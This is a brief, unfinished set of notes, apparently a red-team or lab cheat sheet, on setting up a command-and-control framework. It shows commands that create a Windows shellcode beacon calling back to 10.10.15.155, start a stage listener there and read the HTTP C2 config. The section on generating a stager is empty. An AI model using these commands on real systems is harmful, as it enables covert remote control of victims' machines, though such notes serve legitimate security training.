Command and Control Framework

Creating a Profile

profiles new beacon --http 10.10.15.155 --os windows --arch amd64 --format shellcode --seconds 5 --jitter 3 win64

Stage Listener

stage-listener --url http://10.10.15.155:80 --profile win64

Extension of the Stager

cat /root/.sliver/configs/http-c2.json

Generating Stager Manually

Work in progress!!!